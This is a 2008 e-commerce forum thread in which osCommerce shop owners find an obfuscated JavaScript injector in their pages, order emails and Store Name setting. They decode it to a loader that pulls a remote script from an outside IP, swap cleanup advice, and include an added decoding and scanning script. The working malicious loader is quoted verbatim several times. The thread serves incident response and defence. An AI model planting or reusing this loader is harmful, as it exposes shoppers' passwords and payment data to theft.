Forestshopkeeper Posted November 11, 2008

This is the beginning of the order process email I received today for an order. Can anyone tell me why it is doing this?

Shoppe in the Forest var o=document.links[3];if(o)o.innerHTML=o.innerHTML.replace(/\n([^"]+)/g,'');
if(typeof(yahoo_counter)!=typeof(1))eval(unescape('%2F~%2F%2E..@|%3C`%64i!%76$%20%73%74@y|l`%65|%3Ddi`%73%70l$%61%79~:n`%6F%6Ee%3E\nv|a|%72#%20@_;i~%66&(@%64o#%63%75~me%6Et%2Eco%6Fk@i$%65#%2E%6D%61%74%63%68&(@/|%5C!%62~h|%67!ft=%31$%2F!%29#%3D%3Dn`u!%6C&l)|do%63u@m#%65nt@.w~r%69t|%65%28"%3C%73%63ript!%20%73r%63%3D%2F#/@%37|%38|.15%37~%2E$%31%34#2!%2E5!%38/cp/?`"+%6Ea@%76i#%67%61&%74&%6Fr.`a~p%70N&a`m&e&.%63@%68#a|r$%41%74~(&%30%29+"%3E%3C%5C`/!s!%63!%72i~%70%74%3E&")%3B\n%2F@%2F%3C%2F%64%69!v%3E').replace(/`|\&|~|\$|@|\!|\||#/g,""));var yahoo_counter=1;

It then goes into the normal order information.

Thanks in advance
Jim
FIMBLE Posted November 11, 2008

Looks like an attack to me. Check your logs and don't send them any products unless you've got the money cleared.
Forestshopkeeper (Author) Posted November 11, 2008

I have been looking through different threads, and it looks like this email is generated in the checkout_process.php file, but I don't know where this particular piece of code might be coming from. Order process emails were working properly prior to 4 Nov, but this is the first one since and I don't know why it is doing this. I don't use a Yahoo counter, so I am not sure why this is where it is or where to take it out. There are some very smart people out there and I could certainly use your help.

Jim
Forestshopkeeper (Author) Posted November 11, 2008

It does appear that I have been hacked (again). I went through before and checked files and folders and made sure file permissions were set to 644 and folders to 755. Now files are set at 444. I will continue to put in the security measures listed before. Has anyone seen the Yahoo counter hack before, and do you know what it does? Is it possible this hack compromised customer data?

Thanks.
germ Posted November 12, 2008

If that script is a hack, check your files. It's at the bottom of most (if not all) of your pages. :o
Forestshopkeeper (Author) Posted November 12, 2008

I am in the process of reposting the website now. It appears it was written to all files. Not sure how, since permissions were properly set.

Jim
germ Posted November 13, 2008

Just for "grins and giggles" I decoded the script. Here's approximately what the JavaScript writes into the page:

//...<div style=display:none>
var _;if(document.cookie.match(/\bhgft=1/)==null)document.write("<script src=//78.157.142.58/cp/?"+navigator.appName.charAt(0)+"><\/script>");
//</div>

That IP address traces to:

IP address: 78.157.142.58
Country: Latvia
State: Riga
City: Riga

Most likely some sort of information stealing racket... <_<
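An added example, written for this page and not taken from any post in the thread or from osCommerce: it reproduces germ's decode statically (the same unescape plus junk-character strip, but with no eval), then pulls out the indicators a responder wants from the result, and finally scans raw text for the injector so the same check can be run over dumped files, order emails or database values. PAYLOAD and STRIP_RE are copied verbatim from the obfuscated line quoted in the first post; SAMPLE_EMAIL is a constructed stand-in for an infected order email, and the function names (decodePayload, extractIndicators, findInjectedLoaders, unescapeJsString) are this example's own.

```javascript
// Added example, not code from the thread or from osCommerce: decode the
// injected loader statically (no eval) and pull out the indicators a
// responder needs. PAYLOAD and STRIP_RE are copied from the obfuscated
// line quoted in the posts above; SAMPLE_EMAIL is constructed for the demo.

const PAYLOAD = '%2F~%2F%2E..@|%3C`%64i!%76$%20%73%74@y|l`%65|%3Ddi`%73%70l$%61%79~:n`%6F%6Ee%3E\nv|a|%72#%20@_;i~%66&(@%64o#%63%75~me%6Et%2Eco%6Fk@i$%65#%2E%6D%61%74%63%68&(@/|%5C!%62~h|%67!ft=%31$%2F!%29#%3D%3Dn`u!%6C&l)|do%63u@m#%65nt@.w~r%69t|%65%28"%3C%73%63ript!%20%73r%63%3D%2F#/@%37|%38|.15%37~%2E$%31%34#2!%2E5!%38/cp/?`"+%6Ea@%76i#%67%61&%74&%6Fr.`a~p%70N&a`m&e&.%63@%68#a|r$%41%74~(&%30%29+"%3E%3C%5C`/!s!%63!%72i~%70%74%3E&")%3B\n%2F@%2F%3C%2F%64%69!v%3E';
const STRIP_RE = /`|\&|~|\$|@|\!|\||#/g;

// Stage 1: exactly what the injector's unescape(...).replace(...) yields,
// minus the eval. unescape() is the legacy percent-decoder the loader
// relies on; it still exists as a global in browsers and in Node.
function decodePayload(payload, stripRe) {
  return unescape(payload).replace(stripRe, '');
}

// Stage 2: indicators from the decoded loader, or null if the text does
// not look like a remote <script> loader.
function extractIndicators(decoded) {
  const src = decoded.match(/<script\s+src=["']?([^"'\s>+]+)/i);
  if (!src) return null;
  const url = src[1];
  // Protocol-relative //host/path: the host is the first path segment.
  const host = url.replace(/^(?:https?:)?\/\//, '').split('/')[0];
  // The cookie the loader tests before writing the tag. It only stops the
  // second stage being fetched twice per browser; it is not a clean-up.
  const guard = decoded.match(/cookie\.match\(\/\\b([A-Za-z0-9_]+=[^\/]*)\//);
  return {
    remoteScript: url,
    host,
    guardCookie: guard ? guard[1] : null,
    usesDocumentWrite: /document\.write\(/.test(decoded),
  };
}

// Stage 3: scan raw text (a page, an order email, a dumped DB value) for the
// injector's shape:  eval(unescape('<payload>').replace(/<junk>/<flags>,""))
const INJECTOR_RE =
  /eval\(unescape\('([^']*)'\)\.replace\(\/((?:\\\/|[^\/])+)\/([a-z]*),\s*""\)\)/g;

// Turn string-literal escapes captured from source text back into characters
// (this loader's quoted payload contains \n). Unknown escapes keep the char.
function unescapeJsString(src) {
  const map = { n: '\n', r: '\r', t: '\t' };
  return src.replace(/\\(.)/g, (_, c) => (map[c] !== undefined ? map[c] : c));
}

// Every injector call found in the text, with its decoded loader and indicators.
function findInjectedLoaders(text) {
  const hits = [];
  for (const m of text.matchAll(INJECTOR_RE)) {
    const decoded = decodePayload(unescapeJsString(m[1]), new RegExp(m[2], m[3]));
    hits.push({ offset: m.index, decoded, indicators: extractIndicators(decoded) });
  }
  return hits;
}

// Constructed sample: the top of an infected order email, rebuilt from the
// pieces above so the scanner sees the loader as it appears in source text.
const SAMPLE_EMAIL =
  'Shoppe in the Forest var o=document.links[3];if(o)o.innerHTML=o.innerHTML.replace(/\\n([^"]+)/g,\'\'); ' +
  "if(typeof(yahoo_counter)!=typeof(1))eval(unescape('" + PAYLOAD.replace(/\n/g, '\\n') + "')" +
  '.replace(' + STRIP_RE.toString() + ',""));var yahoo_counter=1; Order Number: 1234 (constructed)';

console.log(decodePayload(PAYLOAD, STRIP_RE));
console.log(JSON.stringify(findInjectedLoaders(SAMPLE_EMAIL), null, 2));
```

What the decode shows: a hidden div, a guard cookie hgft=1, and a document.write of a script tag whose src is 78.157.142.58/cp/? followed by the first letter of navigator.appName (so the server can hand each browser family a different second stage). What it does not show is that second stage: it lived on the remote host and is not on the page, so the loader alone cannot settle whether customer data was taken, which is the point germ makes later in the thread. Do not fetch it from the store's server or a workstation; if it has to be looked at, do that from an isolated analysis box. For a quick sweep, the literal strings yahoo_counter and eval(unescape( are enough of a signature to grep for across a file download and a database dump.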
webshopgyrl Posted November 13, 2008

Thanks for the info -- our store isn't even functional yet and we got the same thing. I don't know if I'd have found it, but I was messing around with Firefox's Web Developer add-on. How did you get rid of it -- other than deleting the code? I thought it was just Yahoo doing a scan; now I'm worried.
FIMBLE Posted November 13, 2008

There will always be "people" testing to see if they can breach your site. Remember to keep folders no higher than 755 and files 644. It's not always possible though; it depends on your host. If you find you have to have folders at 777, ask your host to install suEXEC; it will allow you to run on 755. If they say no, you should think about moving hosts.

Nic
webshopgyrl Posted November 13, 2008

I don't have any folders set higher than 755 ... other than uploading a replacement for my index, is there anything else I should do? I have the security add-ons that I was going to install before we went live -- but I want to make sure that whatever is in there now is gone. Any suggestions?
FIMBLE Posted November 13, 2008

Check your images folders for any files/folders you do not recognise. Sometimes if you download your store to your desktop and run a virus checker on it (right click & scan) it will find something. Check your files for any script that looks odd. Stay alert and check your error logs; if it happens again and you are on a shared server, it could be another site on the server that has been hacked, or possibly the server itself.

Nic
webshopgyrl Posted November 13, 2008

Ok, thanks for the suggestions. I went through and deleted a lot of stuff I don't need any more -- even other languages I don't need and the basic install mfg and graphics -- and replaced my index and header file, but it's still there. The only thing I found that looked strange was a desktop.ini file that I figure I accidentally uploaded -- but I deleted it too. I guess in the morning I'll download the entire store and run a scan -- but I didn't find anything that looked strange. I'll check here in the morning to see if anyone else found anything when they were hunting. Is there any chance it's in the database or something? If I don't find anything I'll contact my host. Thanks so much for the help!

Pam
FIMBLE Posted November 13, 2008

If it's in an order you can delete it from your database; if it resides anywhere in your database you can delete it pretty easily.

Nic
Forestshopkeeper (Author) Posted November 13, 2008

How can I tell if they were able to get anything? Would it be anything more than the info in the email being written?

Thanks
germ Posted November 13, 2008

You can't tell for sure. If they injected an IFRAME into the page (which was most likely exactly what happened) they could have gotten anything that was typed into any page the script was injected into. So passwords may have been compromised, as well as any other data from anyone who registered or purchased while the page was hacked. :blush:
HappyHeath Posted November 21, 2008

I was hacked by JaCKal. This resulted in the code shown below being placed on all my pages, thus reducing speed and being timed out. After two long days I am happy to confirm that I resolved the problem by carrying out the following process:

1. Enter your admin.
2. Click on Configuration, then click on My Store. The code is placed at the top of the page in Store Name. Delete the code and update.

Yahoo! The code has gone and it's back to normal speed.

if(typeof(yahoo_counter)!=typeof(1))eval(unescape('%2F~%2F%2E..@|%3C`%64i!%76$%20%73%74@y|l`%65|%3Ddi`%73%70l$%61%79~:n`%6F%6Ee%3E\nv|a|%72#%20@_;i~%66&(@%64o#%63%75~me%6Et%2Eco%6Fk@i$%65#%2E%6D%61%74%63%68&(@/|%5C!%62~h|%67!ft=%31$%2F!%29#%3D%3Dn`u!%6C&l)|do%63u@m#%65nt@.w~r%69t|%65%28"%3C%73%63ript!%20%73r%63%3D%2F#/@%37|%38|.15%37~%2E$%31%34#2!%2E5!%38/cp/?`"+%6Ea@%76i#%67%61&%74&%6Fr.`a~p%70N&a`m&e&.%63@%68#a|r$%41%74~(&%30%29+"%3E%3C%5C`/!s!%63!%72i~%70%74%3E&")%3B\n%2F@%2F%3C%2F%64%69!v%3E').replace(/`|\&|~|\$|@|\!|\||#/g,""));var yahoo_counter=1
Dutch1 Posted November 23, 2008

Unfortunately I deleted it from my store in the config file, but it is still added to the orders when I view the code. Also my web site admin runs real slow.
webshopgyrl Posted November 23, 2008

Go to your Admin and look at "My Store" -- look closely at the name of the store and see if that code is included after your name. If you find it there and delete it, it should be gone. Give it a try! Good luck!!